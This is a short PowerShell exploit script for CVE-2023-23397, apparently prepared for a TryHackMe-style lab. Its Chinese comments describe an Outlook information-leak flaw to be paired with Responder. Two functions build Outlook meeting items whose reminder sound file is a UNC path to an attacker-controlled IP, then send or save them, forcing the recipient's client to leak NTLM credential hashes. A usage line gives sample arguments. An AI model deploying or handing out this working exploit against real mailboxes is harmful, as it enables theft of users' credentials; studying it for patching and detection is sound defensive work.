
# CVE-2023-23397
# outlook 信息泄露漏洞
# 需要配合Responder 使用

# usage
#  Import-Module .\exp.ps1
# Send-CalendarNTLMLeak -recipient "test@xyc.com" -remotefilepath "192.168.128.132\\\foo\bar.wav" -meetingsubject "THM Meeting" -meetingbody "This is just a test"


function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $meetingbody)
{
    # Add-Type -assembly "Microsoft.Office.Interop.Outlook"

    $Outlook = New-Object -comobject Outlook.Application
    $newcal = $outlook.CreateItem('olAppointmentItem')
    $newcal.ReminderSoundFile = $remotefilepath
    $newcal.Recipients.add($recipient)
    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
    $newcal.Subject = $meetingsubject
    $newcal.Location = "Virtual"
    $newcal.Body = $meetingbody
    $newcal.Start = get-date
    $newcal.End = (get-date).AddHours(2)
    $newcal.ReminderOverrideDefault = 1
    $newcal.ReminderSet = 1
    $newcal.ReminderPlaysound = 1
    $newcal.send()
}

function Save-CalendarNTLMLeak ($remotefilepath, $meetingsubject, $meetingbody)
{
    $Outlook = New-Object -comObject Outlook.Application
    $newcal = $outlook.CreateItem('olAppointmentItem')
    $newcal.ReminderSoundFile = $remotefilepath
    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
    $newcal.Subject = $meetingsubject
    $newcal.Location = "Virtual"
    $newcal.Body = $meetingbody
    $newcal.Start = get-date
    $newcal.End = (get-date).AddHours(2)
    $newcal.ReminderOverrideDefault = 1
    $newcal.ReminderSet = 1
    $newcal.ReminderPlaysound = 1
    $newcal.save()
}
